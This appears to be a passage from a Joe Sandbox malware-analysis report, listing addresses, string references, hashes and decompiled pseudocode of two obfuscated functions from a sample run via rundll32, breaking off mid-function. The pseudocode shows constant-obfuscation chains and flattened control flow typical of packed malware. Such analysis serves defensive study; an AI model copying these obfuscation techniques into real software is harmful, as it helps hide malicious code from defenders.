0x1000fdff
0x1000fe0a
0x1000fe15
0x1000fe24
0x1000fe29
0x1000fe32
0x1000fe3d
0x1000fe48
0x1000fe50
0x1000fe58
0x1000fe63
0x1000fe6b
0x1000fe74
0x1000fe79
0x1000fe7f
0x1000fe87
0x1000fe99
0x1000fe9c
0x1000fea3
0x1000feae
0x1000febb
0x1000fec2
0x1000fec9
0x1000fed0
0x1000fed4
0x1000fedc
0x1000fee4
0x1000feef
0x1000ff05
0x1000ff0d
0x1000ff12
0x1000ff1a
0x1000ff22
0x1000ff2a
0x1000ff35
0x1000ff40
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x1000ff4e
0x1000ff4e
0x1000ff4e
0x1000ff4e
0x1000ff54
0x00000000
0x00000000
0x1000ff5a
0x10010093
0x100100c4
0x100100c9
0x100100cc
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x00000000
0x1000ff4d
0x1000ff60
0x1000ff66
0x10010079
0x10010081
0x10010081
0x10010084
0x00000000
0x00000000
0x1001007e
0x1001007e
0x1001007e
0x10010086
0x10010089
0x00000000
0x1000ff6c
0x1000ff72
0x10010207
0x1000ff78
0x1000ff7e
0x10010061
0x10010066
0x10010069
0x10010069
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x00000000
0x1000ff4d
0x1000ff84
0x1000ff84
0x1000ff8a
0x00000000
0x1000ff90
0x1000ff90
0x1000ff95
0x1000ffa7
0x1000ffb5
0x10010014
0x10010030
0x10010035
0x1001003c
0x1001003f
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x00000000
0x1000ff4d
0x1000ff4b
0x1000ff8a
0x1000ff7e
0x1000ff72
0x1000ff66
0x10010210
0x1001021b
0x1001021b
0x100100d6
0x100100dc
0x100101ce
0x100101d3
0x100101d6
0x100101dd
0x00000000
0x100100e2
0x100100e2
0x100100e8
0x100101a4
0x100101a9
0x100101ab
0x100101ae
0x100101b0
0x100101b2
0x00000000
0x100101b2
0x100100ee
0x100100ee
0x100100f4
0x00000000
0x100100fa
0x1001016e
0x10010173
0x10010175
0x10010178
0x1001017a
0x00000000
0x10010180
0x10010182
0x10010187
0x10010188
0x1000ff4b
0x1000ff4b
0x1000ff4d
0x00000000
0x1000ff4d
0x1000ff4b
0x1001017a
0x100100f4
0x100100e8
0x00000000
0x100101de
0x100101de
0x100101de
0x00000000
0x100101ea

Strings

Jul, xrefs: 1000F858
w={Q, xrefs: 1000FAB7
2(, xrefs: 1000FDC8
Xdoo, xrefs: 1000FD44
*>, xrefs: 1000FE32
lf, xrefs: 1000FBEE
-C, xrefs: 1000FD4C
~', xrefs: 1000FD09
mR, xrefs: 1000FF35
u, xrefs: 1000FA04
Y, xrefs: 1000FBB5
,, xrefs: 1000F8C1
B/, xrefs: 1000FB03
9\/!, xrefs: 1000F97D
c@, xrefs: 1000FA45
Xdoo, xrefs: 1000FD38

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *>$,$-C$2($9\/!$B/$Jul$Xdoo$Xdoo$Y$c@$lf$mR$u$w={Q$~'
API String ID: 0-1002547484
Opcode ID: adedfeae8c5d915a0a1bf16399041e1b234d3be2b24265e5e5cffc66a31987de
Instruction ID: a10887d5309f37cbec44b9bf97499b1ae25e94bdc5a0cbde92779140dd3b492f
Opcode Fuzzy Hash: adedfeae8c5d915a0a1bf16399041e1b234d3be2b24265e5e5cffc66a31987de
Instruction Fuzzy Hash: C832E1715083809FE3B8CF61C849A9BBBE1FBC5744F10891DE2DA96260D7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10011259, Relevance: 19.2, Strings: 15, Instructions: 407
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10011259(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _t456;
				signed int _t460;
				intOrPtr _t483;
				intOrPtr* _t486;
				void* _t490;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				intOrPtr _t542;
				void* _t543;
				intOrPtr* _t550;
				signed int* _t551;
				signed int* _t552;

				_t486 = __ecx;
				_t551 =  &_v328;
				_v144 = __edx;
				_v148 = __ecx;
				_v140 = 0x789b9f;
				_v136 = 0;
				_v132 = 0;
				_v252 = 0x9c45;
				_v252 = _v252 >> 0xa;
				_v252 = _v252 + 0xdca;
				_v252 = _v252 ^ 0x000071fb;
				_v324 = 0x63fc;
				_v324 = _v324 | 0x88cdde90;
				_v324 = _v324 + 0x73bf;
				_v324 = _v324 + 0xfe3;
				_v324 = _v324 ^ 0x88cef902;
				_v292 = 0x54b2;
				_v292 = _v292 >> 0x10;
				_v292 = _v292 | 0xe7a4c23a;
				_v292 = _v292 ^ 0x9f79697b;
				_v292 = _v292 ^ 0x78ddcaec;
				_v192 = 0xd97d;
				_v192 = _v192 * 0x68;
				_t543 = 0x2ff3c5f1;
				_v192 = _v192 ^ 0x005860dd;
				_v276 = 0xcf22;
				_t533 = 0x30;
				_v276 = _v276 * 0x64;
				_v276 = _v276 * 0x23;
				_v276 = _v276 / _t533;
				_v276 = _v276 ^ 0x003aac15;
				_v200 = 0xe99;
				_v200 = _v200 * 0x77;
				_v200 = _v200 ^ 0x0006edd2;
				_v316 = 0x8b49;
				_v316 = _v316 << 5;
				_v316 = _v316 | 0x25c31d21;
				_v316 = _v316 * 0x76;
				_v316 = _v316 ^ 0x6f7b91fa;
				_v300 = 0x416c;
				_v300 = _v300 ^ 0x0db1fc9b;
				_v300 = _v300 | 0xf73ffbe5;
				_v300 = _v300 ^ 0xffbfa19e;
				_v232 = 0x7c56;
				_v232 = _v232 << 7;
				_v232 = _v232 | 0x65dc48c8;
				_v232 = _v232 ^ 0x65fe4a93;
				_v284 = 0xa4ad;
				_v284 = _v284 + 0x3b34;
				_v284 = _v284 | 0x46e5bf9e;
				_v284 = _v284 + 0xaed;
				_v284 = _v284 ^ 0x46e62dba;
				_v308 = 0x51a5;
				_v308 = _v308 + 0xffff7093;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0x4d44;
				_v308 = _v308 ^ 0xffe14d92;
				_v216 = 0x9cb5;
				_v216 = _v216 + 0xa1ba;
				_v216 = _v216 ^ 0x7c221f2f;
				_v216 = _v216 ^ 0x7c23012a;
				_v248 = 0xb7b7;
				_v248 = _v248 + 0xffff0c03;
				_v248 = _v248 ^ 0x49401faf;
				_v248 = _v248 ^ 0xb6bfcfdf;
				_v268 = 0xf946;
				_t534 = 0x23;
				_v268 = _v268 / _t534;
				_v268 = _v268 ^ 0x2bbfee68;
				_v268 = _v268 << 0xa;
				_v268 = _v268 ^ 0xffa5a976;
				_v240 = 0x34aa;
				_v240 = _v240 ^ 0x898fa139;
				_t535 = 0x66;
				_v240 = _v240 * 0xf;
				_v240 = _v240 ^ 0x0f69dc7c;
				_v328 = 0xae94;
				_v328 = _v328 >> 0xd;
				_v328 = _v328 ^ 0x36fbf0c7;
				_v328 = _v328 | 0xa53cbb78;
				_v328 = _v328 ^ 0xb7ffdef1;
				_v208 = 0xbc8e;
				_v208 = _v208 + 0x75c8;
				_v208 = _v208 ^ 0x00011f72;
				_v160 = 0x504a;
				_v160 = _v160 ^ 0xbc1e1624;
				_v160 = _v160 ^ 0xbc1e3fa8;
				_v312 = 0xe1b9;
				_v312 = _v312 ^ 0x616bd030;
				_v312 = _v312 * 0x17;
				_v312 = _v312 << 3;
				_v312 = _v312 ^ 0x050b8b93;
				_v172 = 0x434;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x00007db4;
				_v320 = 0x7186;
				_v320 = _v320 / _t535;
				_v320 = _v320 ^ 0x70a7bdd0;
				_v320 = _v320 + 0xffffa3e3;
				_v320 = _v320 ^ 0x70a70491;
				_v224 = 0x741a;
				_v224 = _v224 << 0xd;
				_v224 = _v224 + 0xffff57ca;
				_v224 = _v224 ^ 0x0e82cf00;
				_v288 = 0xd06d;
				_v288 = _v288 | 0x7ffffd7f;
				_v288 = _v288 ^ 0x7fffa657;
				_v296 = 0x1ceb;
				_v296 = _v296 + 0x45c4;
				_v296 = _v296 << 0xc;
				_t536 = 0x1f;
				_v296 = _v296 * 0x49;
				_v296 = _v296 ^ 0xc23e624a;
				_v164 = 0xac99;
				_v164 = _v164 + 0xffff7636;
				_v164 = _v164 ^ 0x000007a2;
				_v304 = 0xffa9;
				_v304 = _v304 << 0x10;
				_v304 = _v304 / _t536;
				_t537 = 0x2f;
				_v304 = _v304 / _t537;
				_v304 = _v304 ^ 0x002cccb4;
				_v184 = 0x3467;
				_v184 = _v184 ^ 0xc277e171;
				_v184 = _v184 ^ 0xc277d8b3;
				_v176 = 0xda70;
				_v176 = _v176 + 0xffff1f30;
				_v176 = _v176 ^ 0xffffb27f;
				_v260 = 0xae02;
				_v260 = _v260 << 0xc;
				_v260 = _v260 * 0x50;
				_v260 = _v260 ^ 0x660a4938;
				_v256 = 0x63fd;
				_v256 = _v256 + 0x38f;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000034b4;
				_v280 = 0x1bf8;
				_v280 = _v280 | 0x50a879c7;
				_v280 = _v280 ^ 0xa62f7448;
				_v280 = _v280 << 5;
				_v280 = _v280 ^ 0xd0e1eb8a;
				_v244 = 0x35;
				_t538 = 0x63;
				_v244 = _v244 * 0x70;
				_v244 = _v244 << 4;
				_v244 = _v244 ^ 0x000178e8;
				_v156 = 0x4bd8;
				_v156 = _v156 >> 0xa;
				_v156 = _v156 ^ 0x00000c69;
				_v272 = 0xcefd;
				_v272 = _v272 << 4;
				_v272 = _v272 * 0x45;
				_v272 = _v272 + 0xffffd708;
				_v272 = _v272 ^ 0x037c36fb;
				_v196 = 0x7f21;
				_v196 = _v196 * 0x5e;
				_v196 = _v196 ^ 0x002ea2e9;
				_v204 = 0xcb9f;
				_v204 = _v204 / _t538;
				_v204 = _v204 ^ 0x00000b3c;
				_v168 = 0x3be2;
				_v168 = _v168 + 0xffffc6dc;
				_v168 = _v168 ^ 0x000064f9;
				_v264 = 0xf83;
				_v264 = _v264 >> 0xa;
				_v264 = _v264 + 0xacf6;
				_t539 = 0x33;
				_v264 = _v264 / _t539;
				_v264 = _v264 ^ 0x00007950;
				_v236 = 0xe76d;
				_t540 = 0x54;
				_v236 = _v236 / _t540;
				_t541 = 0x1b;
				_v236 = _v236 * 0x11;
				_v236 = _v236 ^ 0x00002164;
				_v188 = 0xc970;
				_v188 = _v188 / _t541;
				_v188 = _v188 ^ 0x00007c4d;
				_v212 = 0xdba3;
				_v212 = _v212 ^ 0x3f6919ac;
				_v212 = _v212 ^ 0x3cbdc81e;
				_v212 = _v212 ^ 0x03d448c8;
				_v220 = 0x9876;
				_v220 = _v220 >> 5;
				_v220 = _v220 * 0x3f;
				_v220 = _v220 ^ 0x00015d8d;
				_v180 = 0xda76;
				_v180 = _v180 + 0xffffee50;
				_v180 = _v180 ^ 0x0000c932;
				_v228 = 0x4db6;
				_v228 = _v228 >> 0xf;
				_v228 = _v228 >> 0xc;
				_v228 = _v228 ^ 0x00001ce0;
				_t550 = _a4;
				_t542 = _v144;
				_t483 = _v144;
				while(_t543 != 0xe3f9543) {
					if(_t543 == 0x265bf3eb) {
						_t456 = E10015A17(_v276,  &_v152, _v200, _v316);
						_pop(_t490);
						_push(_v308);
						_t384 = (_t456 & 0x0000000f) + 4; // 0x4
						E10014047(_t384, _v300, _v232, _t490, _v284,  &_v152,  &_v128);
						 *((char*)(_t551 + (_t456 & 0x0000000f) + 0xf8)) = 0;
						_t460 = E10015A17(_v216,  &_v152, _v248, _v268);
						_t552 =  &(_t551[8]);
						_t547 = _t460 & 0x0000000f;
						_push(_v160);
						_t397 = _t547 + 4; // 0x4
						E10014047(_t397, _v240, _v328, _v216, _v208,  &_v152,  &_v64);
						_push(_v320);
						 *((char*)(_t552 + (_t460 & 0x0000000f) + 0x138)) = 0;
						_push(_v172);
						_t542 = _t542 + E1001E14D(_v224, __eflags, _v288, _v296,  &_v64, E10012164(0x10001534, _v312, __eflags), _v164, _v304, _v144,  &_v128, _v184, _t542);
						E1001C5F7(_v176, _v260, _v256, _v280, _t464);
						_t551 =  &(_t552[0x15]);
						_t543 = 0xe3f9543;
						L10:
						_t486 = _v148;
						continue;
					}
					if(_t543 == 0x2b2ac207) {
						_push(_t486);
						_t542 = E100157E8(_a4);
						 *_t550 = _t542;
						__eflags = _t542;
						if(__eflags == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t543 = 0x265bf3eb;
						_t483 = _a4 + _t542;
						goto L10;
					}
					if(_t543 == 0x2ff3c5f1) {
						_v152 = E10017B6B();
						_t543 = 0x30aa390f;
						goto L10;
					}
					if(_t543 == 0x30aa390f) {
						_t543 = 0x2b2ac207;
						_a4 =  *((intOrPtr*)(_t486 + 4)) + 0x1000;
						continue;
					}
					_t561 = _t543 - 0x3a71eb6b;
					if(_t543 != 0x3a71eb6b) {
						L15:
						__eflags = _t543 - 0x15497eaf;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(_v168);
					_push(_v204);
					E1000D901(_v236, _t561, E10012164(0x10001474, _v196, _t561), _t542, _t483 - _t542, _v144, _v188);
					E1001C5F7(_v212, _v220, _v180, _v228, _t478);
					return 1;
				}
				E10009970(_v244,  *_t486, _v156, _t542,  *((intOrPtr*)(_t486 + 4)), _v272);
				_t486 = _v148;
				_t551 =  &(_t551[4]);
				_t543 = 0x3a71eb6b;
				_t542 = _t542 +  *((intOrPtr*)(_t486 + 4));
				__eflags = _t542;
				goto L15;
			}

0x10011259
0x10011259
0x10011263
0x1001126a
0x10011271
0x1001127e
0x10011285
0x1001128c
0x10011294
0x10011299
0x100112a1
0x100112a9
0x100112b1
0x100112b9
0x100112c1
0x100112c9
0x100112d1
0x100112d9
0x100112de
0x100112e6
0x100112ee
0x100112f6
0x10011309
0x10011310
0x10011315
0x10011320
0x10011331
0x10011332
0x1001133d
0x10011347
0x1001134b
0x10011353
0x10011366
0x1001136d
0x10011378
0x10011380
0x10011385
0x10011392
0x10011396
0x1001139e
0x100113a6
0x100113ae
0x100113b6
0x100113be
0x100113c6
0x100113cb
0x100113d3
0x100113db
0x100113e3
0x100113eb
0x100113f3
0x100113fb
0x10011403
0x1001140b
0x10011413
0x10011418
0x10011420
0x10011428
0x10011433
0x1001143e
0x10011449
0x10011454
0x1001145c
0x10011464
0x1001146c
0x10011476
0x10011482
0x10011487
0x1001148d
0x10011495
0x1001149a
0x100114a2
0x100114aa
0x100114b7
0x100114ba
0x100114be
0x100114c6
0x100114ce
0x100114d3
0x100114db
0x100114e3
0x100114eb
0x100114f6
0x10011501
0x1001150c
0x10011517
0x10011522
0x1001152d
0x10011535
0x10011542
0x10011546
0x1001154b
0x10011553
0x1001155e
0x10011566
0x10011571
0x10011581
0x10011585
0x1001158d
0x10011595
0x1001159d
0x100115a5
0x100115aa
0x100115b2
0x100115ba
0x100115c2
0x100115ca
0x100115d2
0x100115da
0x100115e2
0x100115ec
0x100115ef
0x100115f3
0x100115fb
0x10011606
0x10011611
0x1001161c
0x10011624
0x10011631
0x10011639
0x1001163c
0x10011640
0x10011648
0x10011653
0x1001165e
0x10011669
0x10011674
0x1001167f
0x1001168a
0x10011692
0x1001169c
0x100116a2
0x100116aa
0x100116b2
0x100116ba
0x100116bf
0x100116c7
0x100116cf
0x100116d7
0x100116df
0x100116e4
0x100116ec
0x100116fb
0x100116fe
0x10011702
0x10011707
0x1001170f
0x1001171a
0x10011722
0x1001172d
0x10011735
0x1001173f
0x10011743
0x1001174b
0x10011753
0x10011766
0x1001176d
0x10011778
0x1001178e
0x10011795
0x100117a0
0x100117ab
0x100117b6
0x100117c1
0x100117c9
0x100117ce
0x100117da
0x100117df
0x100117e5
0x100117ed
0x100117f9
0x100117fe
0x10011809
0x1001180a
0x1001180e
0x10011816
0x1001182a
0x10011831
0x1001183c
0x10011847
0x10011852
0x1001185d
0x10011868
0x10011870
0x1001187a
0x1001187e
0x10011886
0x10011891
0x1001189c
0x100118a7
0x100118af
0x100118b4
0x100118b9
0x100118c1
0x100118c8
0x100118cf
0x100118d6
0x100118e8
0x10011a06
0x10011a0c
0x10011a0d
0x10011a36
0x10011a39
0x10011a49
0x10011a5c
0x10011a61
0x10011a6d
0x10011a70
0x10011a93
0x10011a96
0x10011a9b
0x10011aa4
0x10011aac
0x10011b04
0x10011b1a
0x10011b1f
0x10011b22
0x100119b6
0x100119b6
0x00000000
0x100119b6
0x100118f4
0x100119cd
0x100119d6
0x100119d8
0x100119dc
0x100119de
0x10011b64
0x10011b64
0x00000000
0x10011b64
0x100119e7
0x100119ec
0x00000000
0x100119ec
0x10011900
0x100119aa
0x100119b1
0x00000000
0x100119b1
0x1001190c
0x1001198b
0x10011995
0x00000000
0x10011995
0x1001190e
0x10011914
0x10011b58
0x10011b58
0x10011b5e
0x00000000
0x00000000
0x00000000
0x10011b5e
0x1001191a
0x10011926
0x10011956
0x10011978
0x00000000
0x10011982
0x10011b41
0x10011b46
0x10011b4d
0x10011b50
0x10011b55
0x10011b55
0x00000000

Strings

JP, xrefs: 1001150C
m, xrefs: 100117ED
;, xrefs: 100117A0
g4, xrefs: 10011648
M|, xrefs: 10011831
5, xrefs: 100116EC
8If, xrefs: 100116A2
kq:, xrefs: 1001190E
Py, xrefs: 100117E5
kq:, xrefs: 10011B50
DM, xrefs: 10011418
d!, xrefs: 1001180E
4;, xrefs: 100113E3
V|, xrefs: 100113BE
lA, xrefs: 1001139E

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4;$5$8If$DM$JP$M|$Py$V|$d!$g4$kq:$kq:$lA$m$;
API String ID: 0-568511501
Opcode ID: ffee52309dcb3b8a3776b9ae92b59ba598ef45fc93f80cf663b5faca067fc83c
Instruction ID: 7d87d4b9e6001df5490aca812dbbb1cc4364f445d9f358926f4f38338a9f55e9
Opcode Fuzzy Hash: ffee52309dcb3b8a3776b9ae92b59ba598ef45fc93f80cf663b5faca067fc83c
Instruction Fuzzy Hash: 4A2200715093809FE364CF25C98AA8BFBF1FBC5708F10891DE1999A2A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10002628, Relevance: 16.6, Strings: 13, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10002628(signed int __ecx, intOrPtr* __edx) {
				short* _t400;
				signed int _t408;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				short _t457;
				void* _t460;
				intOrPtr* _t464;
				void* _t466;

				 *(_t466 + 0xa4) = 0x1cb5a8;
				 *(_t466 + 0xa8) = 0x505ffa;
				_t457 = 0;
				 *(_t466 + 0xb0) = __ecx;
				 *((intOrPtr*)(_t466 + 0xbc)) = 0;
				_t464 = __edx;
				 *(_t466 + 0x30) = 0x376c;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) << 3;
				_t460 = 0xe980b9f;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0xffff79a1;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0x5a99;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) ^ 0x00018f98;
				 *(_t466 + 0x7c) = 0xd2fb;
				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) + 0xc9d;
				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) ^ 0x0000df88;
				 *(_t466 + 0x50) = 0x1f52;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) | 0x4d6b1b5a;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) >> 7;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) ^ 0x409ad63e;
				 *(_t466 + 0x64) = 0xb688;
				_t412 = 0x15;
				 *(_t466 + 0x68) =  *(_t466 + 0x64) / _t412;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7853c5;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7823fa;
				 *(_t466 + 0x14) = 0x1176;
				_t413 = 0x74;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) * 0x26;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffff909d;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffdc13;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0x000201fd;
				 *(_t466 + 0x94) = 0xba7a;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) << 0xa;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x02e990c5;
				 *(_t466 + 0x24) = 0xa3c4;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x9ff723c2;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) / _t413;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) + 0x3928;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x01616723;
				 *(_t466 + 0x1c) = 0x7213;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) | 0x351e9b59;
				_t414 = 0x5f;
				 *(_t466 + 0x18) =  *(_t466 + 0x1c) * 0x1d;
				 *(_t466 + 0x18) =  *(_t466 + 0x18) >> 3;
				 *(_t466 + 0x18) =  *(_t466 + 0x18) ^ 0x00904fb7;
				 *(_t466 + 0x5c) = 0x297a;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) | 0x66c43148;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xbef6;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0x66c4e3a8;
				 *(_t466 + 0xa8) = 0xb108;
				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) + 0xffffb23b;
				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) ^ 0x00003984;
				 *(_t466 + 0x60) = 0x972c;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) | 0x55a95463;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) << 3;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) ^ 0xad4eaf49;
				 *(_t466 + 0x38) = 0xedfb;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) / _t414;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) + 0xffffecb7;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) << 0xe;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) ^ 0xfbce5bfc;
				 *(_t466 + 0x44) = 0x5f66;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) << 8;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) * 0x4b;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) ^ 0x1bf2eb8b;
				 *(_t466 + 0x74) = 0xc9a;
				 *(_t466 + 0x74) =  *(_t466 + 0x74) + 0x2510;
				 *(_t466 + 0x74) =  *(_t466 + 0x74) ^ 0x00001e79;
				 *(_t466 + 0x58) = 0xe86a;
				_t415 = 0x5c;
				 *(_t466 + 0x5c) =  *(_t466 + 0x58) / _t415;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xffff7371;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0xffff2425;
				 *(_t466 + 0x84) = 0xcc82;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) + 0xc6d3;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x0001c52d;
				 *(_t466 + 0xb0) = 0x36af;
				_t408 = 0x79;
				 *(_t466 + 0xac) =  *(_t466 + 0xb0) / _t408;
				 *(_t466 + 0xac) =  *(_t466 + 0xac) ^ 0x00000e87;
				 *(_t466 + 0x4c) = 0x72c3;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xfe00;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xffffcf74;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) ^ 0x00017982;
				 *(_t466 + 0x88) = 0xe5b8;
				 *(_t466 + 0x88) =  *(_t466 + 0x88) + 0xffff64c8;
				 *(_t466 + 0x88) =  *(_t466 + 0x88) ^ 0x00004835;
				 *(_t466 + 0x3c) = 0xe83b;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x50645aeb;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) << 4;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) >> 0xe;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x000050c9;
				 *(_t466 + 0x34) = 0x9196;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 9;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 5;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) << 5;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) ^ 0x00007a23;
				 *(_t466 + 0x24) = 0x47d0;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x92809c60;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x0aa14077;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) >> 9;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x004c1604;
				 *(_t466 + 0x54) = 0xa739;
				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b351c6;
				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b3adaf;
				 *(_t466 + 0x6c) = 0x41b6;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) + 0x2b93;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) >> 6;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) ^ 0x000038f9;
				 *(_t466 + 0x94) = 0xf0c0;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) * 0x45;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x0040ff8e;
				 *(_t466 + 0x8c) = 0x53d0;
				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) | 0x714ab1e7;
				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) ^ 0x714af8de;
				 *(_t466 + 0x28) = 0xe7ca;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) | 0x74901d91;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) >> 2;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) << 2;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) ^ 0x7490bdaa;
				 *(_t466 + 0x84) = 0x4172;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) * 0x69;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x001ac2d4;
				 *(_t466 + 0x78) = 0xc4a2;
				 *(_t466 + 0x78) =  *(_t466 + 0x78) | 0xb1071ce6;
				 *(_t466 + 0x78) =  *(_t466 + 0x78) ^ 0xb107e3cc;
				 *(_t466 + 0x98) = 0xafb5;
				 *(_t466 + 0x98) =  *(_t466 + 0x98) >> 5;
				 *(_t466 + 0x98) =  *(_t466 + 0x98) ^ 0x000050c6;
				 *(_t466 + 0x48) = 0x5e6d;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) + 0xffff30ef;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) << 6;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) ^ 0xffe3f79c;
				 *(_t466 + 0xa4) = 0xfcdb;
				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) << 0xd;
				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) ^ 0x1f9b008b;
				 *(_t466 + 0x1c) = 0x2d62;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) >> 7;
				_t416 = 0x36;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) / _t416;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) + 0xffff17c7;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) ^ 0xffff0d36;
				 *(_t466 + 0xa0) = 0xd9f3;
				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) + 0x7ef3;
				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) ^ 0x00014615;
				 *(_t466 + 0x2c) = 0x45e6;
